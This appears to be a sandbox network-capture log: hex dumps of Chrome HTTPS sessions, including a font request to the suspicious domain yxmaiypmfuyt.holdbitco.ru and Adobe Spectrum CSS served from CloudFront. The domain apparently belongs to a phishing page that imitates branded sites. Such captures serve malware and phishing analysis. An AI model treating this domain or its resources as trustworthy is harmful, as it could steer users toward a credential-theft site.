                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:39 UTC656INData Raw: 78 38 d3 43 de 2b 4b 2e ab a3 8a 59 76 d9 e9 59 fb c4 3d cf 50 02 69 f7 c1 36 5e 40 d6 2d 51 00 db f0 56 5d 24 d7 33 c7 fd 2d 2d 24 90 ec b6 4b 8a 93 eb 89 5e 26 44 33 3f ec d0 53 37 80 fa 9a 0c 90 3e a0 ca 32 da 11 66 3b a9 34 6a 11 28 a8 68 e8 58 eb 5a 65 b3 94 97 7b cb 2b 35 ee 92 f2 a0 58 71 ea a3 0d 55 d3 b1 f4 f5 a1 ca 87 a6 a4 eb e2 97 2f ea 82 69 26 ca a8 2b dc e6 19 51 a1 b8 f5 d2 6b 8b 7b ce 42 f5 b2 45 eb cc 05 55 bc 57 9c 8a a7 04 a9 66 58 08 14 54 34 74 4c ac cd ad 4c 2e e4 78 16 1c 1a b3 8a fd 02 47 49 3a 59 9c 17 e0 a0 5c e5 ce 2f 6e ae 52 2c 34 2f 5b 94 bb be 16 40 79 42 d6 bf 62 77 c6 cb 4a ea 89 42 a0 a0 a2 a1 63 62 b9 a6 3e f1 25 61 01 56 ea fc 19 ab 40 56 2d c7 29 b2 9d f5 99 dd d2 5c 8e 3c c4 21 14 63 84 e6 75 63 a5 22 a8 e8 5e 72 04
                                                                                                                                                                                                                                                                                                              Data Ascii: x8C+K.YvY=Pi6^@-QV]$3--$K^&D3?S7>2f;4j(hXZe{+5XqU/i&+Qk{BEUWfXT4tLL.xGI:Y\/nR,4/[@yBbwJBcb>%aV@V-)\<!cuc"^r
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:39 UTC658INData Raw: b3 c5 59 c0 67 b3 b8 0b fb 7a 87 46 7c fc c8 ac 1c 23 2b d7 22 0e e5 a2 b7 c4 64 5b 57 72 8b 45 a7 95 f5 3c 45 f2 0f f8 ef ec e0 c4 5f ed 9c 6f 5a 53 e6 6b 10 eb c7 41 a5 38 b1 5c c9 2e 83 c3 ed 9d cc 07 0d 9e 29 e0 26 0e c3 12 f1 45 a3 cc 09 98 72 fc a2 ee 4d da 2b e6 ef b3 80 1d 9e ad 12 81 d6 b2 5e ec da 90 b6 ea 1f a0 c8 3a 7e 29 24 b8 49 0e ab a8 70 58 ad b9 08 67 a9 10 a7 ed b0 90 6a 5b 26 23 6f c7 12 b8 2e 5b b0 19 60 1e 55 38 8b 38 d8 22 5d de 6a 14 e5 28 45 bc 2c 54 a0 8c 5b b2 6f 56 41 bc 9f b9 60 39 b8 e4 81 ab 6d db 81 cd c0 3c e2 da d3 99 03 7b 2b 34 04 96 51 9f 2c be 54 db 87 46 9e 1d 23 e5 b4 4f eb 41 a4 9a 97 bf 7d 88 cc b5 de 65 ca d3 f1 b8 b5 18 1e a1 eb a1 2a 92 9f 34 74 77 90 ae b6 92 9f 87 e9 4f e6 d8 07 b4 dd 70 64 3c da 43 e1 e5 f1
                                                                                                                                                                                                                                                                                                              Data Ascii: YgzF|#+"d[WrE<E_oZSkA8\.)&ErM+^:~)$IpXgj[&#o.[`U88"]j(E,T[oVA`9m<{+4Q,TF#OA}e*4twOpd<C
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:39 UTC659INData Raw: f5 a0 81 2e 1c 59 af 17 12 42 1c 52 15 58 69 d4 c5 d6 a3 01 cd e4 a9 4a b7 6b 1d 0e 83 4f b3 98 02 4a 0b 2a 17 b0 4d ec e8 4e 99 60 cd 82 be 2d b9 21 32 23 21 5a 0d 29 7b 0d fd 34 62 e9 47 c2 a3 bc 96 af 8c 7f d6 5f 7e ad d3 2b f1 cf fc 56 94 53 a9 b3 e1 cf b6 91 db 4a 42 f0 5d 67 67 79 60 6c d5 f6 55 0f 41 a6 91 11 6c 31 90 9f 80 47 c3 36 a6 16 f1 6c a6 e4 1e c7 5f c0 33 ad 17 f8 35 f7 7d 1f 51 09 c8 24 ea b0 32 74 9e ec 18 79 be 55 ce a4 d2 ec 3a 45 2e f2 f9 6a ef 7a a8 61 67 5c 32 a7 22 84 67 ee b5 d4 82 1f 5a 94 73 9d c1 e1 4e 22 ae a3 ca 20 db 6e df 42 a9 55 02 17 b1 50 b3 44 7f 2e e1 02 c9 4f 5a 41 ba ec 0e 03 36 99 1f a1 9d 79 a1 07 d8 4d c6 bf 3c 3e 74 41 6d d7 5f cb 9c bb 08 0a 46 79 9a 8e 56 09 6d 65 4b e7 1c 8a bd 70 85 10 bb f3 21 2b 58 15 81
                                                                                                                                                                                                                                                                                                              Data Ascii: .YBRXiJkOJ*MN`-!2#!Z){4bG_~+VSJB]ggy`lUAl1G6l_35}Q$2tyU:E.jzag\2"gZsN" nBUPD.OZA6yM<>tAm_FyVmeKp!+X
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:39 UTC660INData Raw: 0b 5f d1 67 20 9f 4a d4 8f cb 6c 73 b9 98 c4 9b b2 41 fa cd 44 1a ba fe 90 a5 60 a6 d9 99 94 c3 9c c8 7a 28 8c a7 97 bb 0d 8c 38 e3 95 4e 2c f2 f4 1f 6a 8d 93 a8 85 51 16 08 fa de c5 da 77 94 d9 9e 2f 26 15 05 79 6c 37 33 29 16 3c ba 0b 03 d7 1e 25 5c e3 5a a0 0d 6d 7c a9 b8 0e 2a 8e 9b a4 92 ac a4 7b 46 64 27 99 f9 d8 21 ca 5d e5 55 98 96 62 3d 06 9d f4 30 9c 2f 5c c8 07 f5 e0 bf 79 b4 90 b9 58 6e 03 15 1d eb 3d 47 04 c6 0a 20 f9 cb f4 f8 17 c7 f7 71 4c 82 da 66 81 04 e6 1a 14 ae 0f 0f d9 59 a1 43 24 51 51 54 93 22 01 62 da 87 bb c6 21 4a 1a 98 28 70 4b 97 66 f5 58 93 72 2e e5 d5 aa 7f 0e 30 1b 9e 92 27 1b 0e 84 c8 e1 73 cc dc 3d 96 ec 3e ad fc 12 96 ee 04 be 3d 61 64 85 47 61 35 8f 69 01 37 96 66 e6 d1 90 cc 0b 45 e2 79 c4 13 55 68 e8 25 71 1c 6b 85 55
                                                                                                                                                                                                                                                                                                              Data Ascii: _g JlsAD`z(8N,jQw/&yl73)<%\Zm|*{Fd'!]Ub=0/\yXn=G qLfYC$QQT"b!J(pKfXr.0's=>=adGa5i7fEyUh%qkU
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:39 UTC662INData Raw: 6b 0c f0 b7 0a 33 64 bc bf ef 0f 04 a8 48 3a 38 8a 49 5c 10 90 5d d0 6d 06 53 69 fb 07 31 c6 44 c6 1a 53 ac 5b 6b 6b a2 c0 6b d8 c1 ea 28 df bc f6 22 f9 f8 16 ea f9 4f 6f ff bc fb f3 fc e9 bd 87 ab b6 2a 39 f3 1c 4a 94 12 7b 52 6a c6 db ea ae 85 a9 20 cf fd 89 d9 56 59 91 94 e2 7d 10 e6 b4 7d 82 b2 f0 b2 ad 29 90 a2 48 6d c9 06 3e 45 84 49 31 55 9e ec 53 26 c4 f9 51 d3 e1 7c 2a 59 14 f7 76 65 49 0d 88 13 3b 66 48 22 8a 08 42 e8 26 e0 30 68 44 30 d8 5d 4d e6 e7 e5 98 b6 4f 24 62 44 21 11 a8 5e 2f 27 36 10 16 67 79 f0 22 e5 48 fb 9c 8a ae ec fb 71 64 8f f6 40 cf 4f 70 04 d7 5f 9c ee af 97 e5 ab ea fd a1 1d b5 a6 bf 52 61 60 b9 91 13 a1 d5 79 fe f2 75 43 c2 93 15 0f 3b 54 66 37 2c 76 06 74 d9 c6 c4 ea 52 d6 b4 49 b8 bd bf 72 0e 2d 80 16 6c 1f 91 22 49 21 4e
                                                                                                                                                                                                                                                                                                              Data Ascii: k3dH:8I\]mSi1DS[kkk("Oo*9J{Rj VY}})Hm>EI1US&Q|*YveI;fH"B&0hD0]MO$bD!^/'6gy"Hqd@Op_Ra`yuC;Tf7,vtRIr-l"I!N
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:39 UTC663INData Raw: 2d 49 b9 7c 31 0c 44 94 5e 58 a0 d7 29 e4 45 91 5a 5e 5a 50 5d 58 9d 93 a5 fb 05 ae 6f 92 19 2a b9 56 a1 8d 72 c4 89 39 b2 18 59 b1 80 d2 a6 bf b9 a9 7e 3f 08 b0 03 0b e8 e6 3a 00 0a 74 09 2c 01 95 f3 6b 04 14 dd e0 17 38 fb f4 8f e1 a8 9f 20 fe a7 c0 42 2f 3f 96 b6 a9 43 c5 d2 27 5f 1c 3b b6 85 d4 97 0f b5 93 20 6c ae 83 46 a4 e0 74 5a 06 02 a0 77 5e 5a f1 3a 73 ef 4e fc 3f 08 68 02 dc 2c ff ef 0e 24 fb 59 71 d6 7e ea f1 2a b5 c1 bc e8 df 0c af 23 fc cb 88 ca 72 2d 84 59 c7 13 88 a1 7f b0 e0 af 9a 44 fe dc c7 4d 17 eb 17 2f 40 1c 8c 3b 51 f0 fb ec c4 c8 56 cc 76 af 63 ae 28 13 9f cd 7c 53 51 c2 62 ff 23 e5 b2 a9 72 40 ea 7e a4 7d 89 c1 94 b7 3d 07 39 bf e0 b5 77 a6 da 21 b4 d6 87 98 2a 25 69 81 b7 5f 43 4a 04 72 06 0e 91 5c 70 b3 ef e4 dc de 9b e0 54 50
                                                                                                                                                                                                                                                                                                              Data Ascii: -I|1D^X)EZ^ZP]Xo*Vr9Y~?:t,k8 B/?C'_; lFtZw^Z:sN?h,$Yq~*#r-YDM/@;QVvc(|SQb#r@~}=9w!*%i_CJr\pTP
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:39 UTC664INData Raw: c1 6a 3a b4 47 ce 65 96 3a 76 72 75 aa c9 f3 8c 42 0d 7d d9 76 c6 51 e9 d7 f9 5d db c6 0c 70 24 35 aa 53 4e ef 7c 00 b2 70 76 74 d2 63 4b 1e c9 25 fd 50 51 38 c0 1e d9 9f c8 de 71 eb ed 67 a5 73 c7 01 07 93 36 77 8a c5 63 c1 11 ec 29 65 42 78 08 5a 18 ce fb b2 1e e4 0a b5 6f e2 d3 ab 12 f0 5e 14 fc b5 6e 3c 4e 47 fb a2 bf 2c 7d cb 4a 2a cb 47 fb 10 51 a5 59 8f b8 66 72 7a 88 b3 59 64 7b 75 2a dd b9 f7 ed 98 66 4b f2 5b 24 de 58 17 73 af 48 3f 86 e4 82 65 5a fc 2a 88 12 15 9a 42 73 e0 40 b9 5e 95 5a 0b c9 aa 26 ad 8d 40 75 1b 72 17 db 49 96 4d 86 e1 2c e4 e9 15 7c 43 64 ab b3 8a 37 43 9b a7 f2 6f f1 a1 f7 0a 49 eb 35 b6 8d 7a d8 4f 0c d4 65 c5 52 c4 f6 ba 05 75 68 71 bb a2 73 85 eb 19 f9 9b 8a 73 5f 48 2f 6b 42 5d 4d b6 5d da 3f 6d 7e 56 53 1c 30 30 28 d8
                                                                                                                                                                                                                                                                                                              Data Ascii: j:Ge:vruB}vQ]p$5SN|pvtcK%PQ8qgs6wc)eBxZo^n<NG,}J*GQYfrzYd{u*fK[$XsH?eZ*Bs@^Z&@urIM,|Cd7CoI5zOeRuhqss_H/kB]M]?m~VS00(
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:39 UTC666INData Raw: 98 f4 06 92 e6 5c 37 99 d2 d5 4b 89 63 01 dd 7e b4 c8 c4 06 99 d8 7c 28 a0 cf f6 b1 61 9b 64 21 17 bf 36 ba aa b8 8f e7 cb 93 68 fc 27 d1 3f 58 3e 25 e0 94 15 92 73 76 af d5 bf 1c fb 8d 6b 4f 01 f0 47 be ef 8c 00 4e be 5c fa 60 1b 01 21 cc 57 3a e0 44 06 e1 c8 cf d7 5b ff 17 fe 6c 4f b8 00 18 b3 e1 fa 7b 7e 48 fd c9 ff 27 6b 26 2d fe 4d 42 66 02 4e cd da c4 41 da df 9a d2 37 3e 98 1b cb c4 e4 0f 8f df c7 ab f6 a9 c9 49 7e d7 b3 df 93 95 bb 11 32 01 ae 1f 0d 00 00 00
                                                                                                                                                                                                                                                                                                              Data Ascii: \7Kc~|(ad!6h'?X>%svkOGN\`!W:D[lO{~H'k&-MBfNA7>I~2


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              59192.168.2.1649799104.21.0.95443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:39 UTC694OUTGET /web5/assets/fonts/GDSherpa-regular.woff2 HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: yxmaiypmfuyt.holdbitco.ru
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              Origin: https://yxmaiypmfuyt.holdbitco.ru
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: font
                                                                                                                                                                                                                                                                                                              Referer: https://yxmaiypmfuyt.holdbitco.ru/ynabwktmc
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              699.86.229.114443192.168.2.1649731C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:17 UTC5INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Content-Type: text/css
                                                                                                                                                                                                                                                                                                              Content-Length: 170801
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Last-Modified: Mon, 18 Oct 2021 13:18:19 GMT
                                                                                                                                                                                                                                                                                                              x-amz-storage-class: INTELLIGENT_TIERING
                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                              Server: AmazonS3
                                                                                                                                                                                                                                                                                                              Date: Wed, 25 Oct 2023 13:19:04 GMT
                                                                                                                                                                                                                                                                                                              Cache-Control: max-age=43200
                                                                                                                                                                                                                                                                                                              ETag: "99b8d621035a6f6e7279adcc4bbe80c5"
                                                                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                              X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                                              Via: 1.1 366b9fc9e06517905c8f46d7549058fc.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                              X-Amz-Cf-Pop: IAD79-C3
                                                                                                                                                                                                                                                                                                              X-Amz-Cf-Id: hXcP9XHoNnnyooxamMtNigCY3cLhg8cHJtaAuAg6yIXm9lOfIhjI5g==
                                                                                                                                                                                                                                                                                                              Age: 11294
                                                                                                                                                                                                                                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:17 UTC6INData Raw: 2f 2a 0a 20 2a 20 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 38 20 41 64 6f 62 65 20 53 79 73 74 65 6d 73 20 49 6e 63 6f 72 70 6f 72 61 74 65 64 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 20 2a 20 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 6c 69 63 65 6e 73 65 64 20 74 6f 20 79 6f 75 20 75 6e 64 65 72 20 74 68 65 20 41 70 61 63 68 65 20 4c 69 63 65 6e 73 65 2c 20 56 65 72 73 69 6f 6e 20 32 2e 30 20 28 74 68 65 20 22 4c 69 63 65 6e 73 65 22 29 3b 0a 20 2a 20 20 79 6f 75 20 6d 61 79 20 6e 6f 74 20 75 73 65 20 74 68 69 73 20 66 69 6c 65 20 65 78 63 65 70 74 20 69 6e 20 63 6f 6d 70 6c 69 61 6e 63 65 20 77 69 74 68 20 74 68 65 20 4c 69 63 65 6e 73 65 2e 20 59 6f 75 20 6d 61 79 20 6f 62 74 61 69 6e 20 61 20 63 6f 70 79 0a 20 2a 20 20 6f
                                                                                                                                                                                                                                                                                                              Data Ascii: /* * Copyright 2018 Adobe Systems Incorporated. All rights reserved. * This file is licensed to you under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. You may obtain a copy * o
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:17 UTC22INData Raw: 75 6d 2d 48 65 61 64 69 6e 67 31 2d 2d 64 69 73 70 6c 61 79 2e 73 70 65 63 74 72 75 6d 2d 48 65 61 64 69 6e 67 31 2d 2d 71 75 69 65 74 7b 66 6f 6e 74 2d 73 69 7a 65 3a 34 35 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 33 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 33 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 30 3b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 38 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 7d 2e 75 74 69 6c 6e 61 76 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 73 70 65 63 74 72 75 6d 2d 48 65 61 64 69 6e 67 31 2d 2d 64 69 73 70 6c 61 79 2e 73 70 65 63 74 72 75 6d 2d 48 65 61 64 69 6e 67 31 2d 2d 71 75 69 65 74 20 65 6d
                                                                                                                                                                                                                                                                                                              Data Ascii: um-Heading1--display.spectrum-Heading1--quiet{font-size:45px;font-weight:300;line-height:1.3;font-style:normal;letter-spacing:0;text-transform:none;margin-bottom:8px;margin-top:8px}.utilnav-container .spectrum-Heading1--display.spectrum-Heading1--quiet em
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:17 UTC23INData Raw: 6d 3a 31 36 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 7d 2e 75 74 69 6c 6e 61 76 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 73 70 65 63 74 72 75 6d 2d 41 72 74 69 63 6c 65 20 2e 73 70 65 63 74 72 75 6d 2d 42 6f 64 79 31 20 65 6d 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 30 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 35 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 69 74 61 6c 69 63 3b 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 2e 30 31 32 35 65 6d 3b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6e 6f 6e 65 7d 2e 75 74 69 6c 6e 61 76 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 73 70 65 63 74 72 75 6d 2d 41 72 74 69 63 6c 65 20 2e 73 70 65 63 74 72 75 6d 2d 42 6f 64 79 31 20 73 74 72 6f 6e 67 7b 66 6f 6e 74 2d 73 69 7a 65
                                                                                                                                                                                                                                                                                                              Data Ascii: m:16px;margin-top:8px}.utilnav-container .spectrum-Article .spectrum-Body1 em{font-size:20px;font-weight:400;line-height:1.5;font-style:italic;letter-spacing:.0125em;text-transform:none}.utilnav-container .spectrum-Article .spectrum-Body1 strong{font-size
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:17 UTC51INData Raw: 72 75 6d 3a 6c 61 6e 67 28 7a 68 29 20 2e 73 70 65 63 74 72 75 6d 2d 42 6f 64 79 34 20 73 74 72 6f 6e 67 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 39 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 37 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 2e 30 35 65 6d 3b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6e 6f 6e 65 7d 2e 75 74 69 6c 6e 61 76 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 73 70 65 63 74 72 75 6d 3a 6c 61 6e 67 28 6a 61 29 20 2e 73 70 65 63 74 72 75 6d 2d 42 6f 64 79 2d 2d 73 6d 61 6c 6c 2c 2e 75 74 69 6c 6e 61 76 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 73 70 65 63 74 72 75 6d 3a 6c 61 6e 67 28 6a 61 29 20 2e 73 70 65 63 74 72 75 6d 2d 42 6f 64 79 35
                                                                                                                                                                                                                                                                                                              Data Ascii: rum:lang(zh) .spectrum-Body4 strong{font-size:14px;font-weight:900;line-height:1.7;font-style:normal;letter-spacing:.05em;text-transform:none}.utilnav-container .spectrum:lang(ja) .spectrum-Body--small,.utilnav-container .spectrum:lang(ja) .spectrum-Body5
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:17 UTC67INData Raw: 72 2d 73 70 61 63 69 6e 67 3a 2e 30 35 65 6d 3b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 38 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 7d 2e 75 74 69 6c 6e 61 76 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 73 70 65 63 74 72 75 6d 3a 6c 61 6e 67 28 6a 61 29 20 2e 73 70 65 63 74 72 75 6d 2d 48 65 61 64 69 6e 67 32 2d 2d 64 69 73 70 6c 61 79 20 65 6d 2c 2e 75 74 69 6c 6e 61 76 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 73 70 65 63 74 72 75 6d 3a 6c 61 6e 67 28 6b 6f 29 20 2e 73 70 65 63 74 72 75 6d 2d 48 65 61 64 69 6e 67 32 2d 2d 64 69 73 70 6c 61 79 20 65 6d 2c 2e 75 74 69 6c 6e 61 76 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 73 70 65 63 74 72 75 6d 3a 6c 61 6e 67 28 7a 68 29 20 2e 73 70 65 63 74 72 75 6d 2d
                                                                                                                                                                                                                                                                                                              Data Ascii: r-spacing:.05em;text-transform:none;margin-bottom:8px;margin-top:8px}.utilnav-container .spectrum:lang(ja) .spectrum-Heading2--display em,.utilnav-container .spectrum:lang(ko) .spectrum-Heading2--display em,.utilnav-container .spectrum:lang(zh) .spectrum-
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:17 UTC83INData Raw: 63 74 72 75 6d 3a 6c 61 6e 67 28 6a 61 29 20 2e 73 70 65 63 74 72 75 6d 2d 48 65 61 64 69 6e 67 32 2d 2d 64 69 73 70 6c 61 79 2c 2e 75 74 69 6c 6e 61 76 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 73 70 65 63 74 72 75 6d 2d 2d 6c 69 67 68 74 20 2e 73 70 65 63 74 72 75 6d 3a 6c 61 6e 67 28 6b 6f 29 20 2e 73 70 65 63 74 72 75 6d 2d 48 65 61 64 69 6e 67 32 2d 2d 64 69 73 70 6c 61 79 2c 2e 75 74 69 6c 6e 61 76 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 73 70 65 63 74 72 75 6d 2d 2d 6c 69 67 68 74 20 2e 73 70 65 63 74 72 75 6d 3a 6c 61 6e 67 28 7a 68 29 20 2e 73 70 65 63 74 72 75 6d 2d 48 65 61 64 69 6e 67 32 2d 2d 64 69 73 70 6c 61 79 7b 63 6f 6c 6f 72 3a 23 32 63 32 63 32 63 7d 2e 75 74 69 6c 6e 61 76 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 73 70 65 63 74 72 75 6d 2d 2d 6c 69
                                                                                                                                                                                                                                                                                                              Data Ascii: ctrum:lang(ja) .spectrum-Heading2--display,.utilnav-container .spectrum--light .spectrum:lang(ko) .spectrum-Heading2--display,.utilnav-container .spectrum--light .spectrum:lang(zh) .spectrum-Heading2--display{color:#2c2c2c}.utilnav-container .spectrum--li
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:17 UTC97INData Raw: 67 65 20 2e 73 70 65 63 74 72 75 6d 2d 55 49 49 63 6f 6e 2d 2d 6d 65 64 69 75 6d 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 75 74 69 6c 6e 61 76 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 73 70 65 63 74 72 75 6d 2d 2d 6c 61 72 67 65 20 2e 73 70 65 63 74 72 75 6d 2d 55 49 49 63 6f 6e 2d 2d 6c 61 72 67 65 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 7d 2e 75 74 69 6c 6e 61 76 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 73 70 65 63 74 72 75 6d 2d 2d 6c 61 72 67 65 7b 2d 2d 75 69 2d 69 63 6f 6e 2d 6c 61 72 67 65 2d 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 2d 2d 75 69 2d 69 63 6f 6e 2d 6d 65 64 69 75 6d 2d 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 75 74 69 6c 6e 61 76 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 73 70 65 63 74 72 75 6d 2d 2d 6d 65 64 69 75 6d 7b 2d 2d 75 69 2d 69
                                                                                                                                                                                                                                                                                                              Data Ascii: ge .spectrum-UIIcon--medium{display:none}.utilnav-container .spectrum--large .spectrum-UIIcon--large{display:inline}.utilnav-container .spectrum--large{--ui-icon-large-display:block;--ui-icon-medium-display:none}.utilnav-container .spectrum--medium{--ui-i
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:17 UTC112INData Raw: 23 34 62 34 62 34 62 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 34 62 34 62 34 62 3b 63 6f 6c 6f 72 3a 23 66 66 66 7d 2e 75 74 69 6c 6e 61 76 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 73 70 65 63 74 72 75 6d 2d 2d 6c 69 67 68 74 20 2e 73 70 65 63 74 72 75 6d 2d 42 75 74 74 6f 6e 2d 2d 70 72 69 6d 61 72 79 2e 66 6f 63 75 73 2d 72 69 6e 67 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 31 34 37 33 65 36 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 31 34 37 33 65 36 3b 63 6f 6c 6f 72 3a 23 66 66 66 7d 2e 75 74 69 6c 6e 61 76 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 73 70 65 63 74 72 75 6d 2d 2d 6c 69 67 68 74 20 2e 73 70 65 63 74 72 75 6d 2d 42 75 74 74 6f 6e 2d 2d 70 72 69 6d 61 72 79 3a 61 63 74 69 76 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72
                                                                                                                                                                                                                                                                                                              Data Ascii: #4b4b4b;border-color:#4b4b4b;color:#fff}.utilnav-container .spectrum--light .spectrum-Button--primary.focus-ring{background-color:#1473e6;border-color:#1473e6;color:#fff}.utilnav-container .spectrum--light .spectrum-Button--primary:active{background-color
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:17 UTC128INData Raw: 20 2e 73 70 65 63 74 72 75 6d 2d 2d 6c 69 67 68 74 20 2e 73 70 65 63 74 72 75 6d 2d 46 69 65 6c 64 42 75 74 74 6f 6e 3a 64 69 73 61 62 6c 65 64 20 2e 73 70 65 63 74 72 75 6d 2d 49 63 6f 6e 7b 63 6f 6c 6f 72 3a 23 63 61 63 61 63 61 7d 2e 75 74 69 6c 6e 61 76 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 73 70 65 63 74 72 75 6d 2d 2d 6c 69 67 68 74 20 2e 73 70 65 63 74 72 75 6d 2d 46 69 65 6c 64 42 75 74 74 6f 6e 2d 2d 71 75 69 65 74 7b 63 6f 6c 6f 72 3a 23 34 62 34 62 34 62 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 7d 2e 75 74 69 6c 6e 61 76 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 73 70 65 63 74 72 75 6d 2d 2d 6c 69 67 68 74 20 2e 73 70 65 63 74 72 75
                                                                                                                                                                                                                                                                                                              Data Ascii: .spectrum--light .spectrum-FieldButton:disabled .spectrum-Icon{color:#cacaca}.utilnav-container .spectrum--light .spectrum-FieldButton--quiet{color:#4b4b4b;border-color:transparent;background-color:transparent}.utilnav-container .spectrum--light .spectru
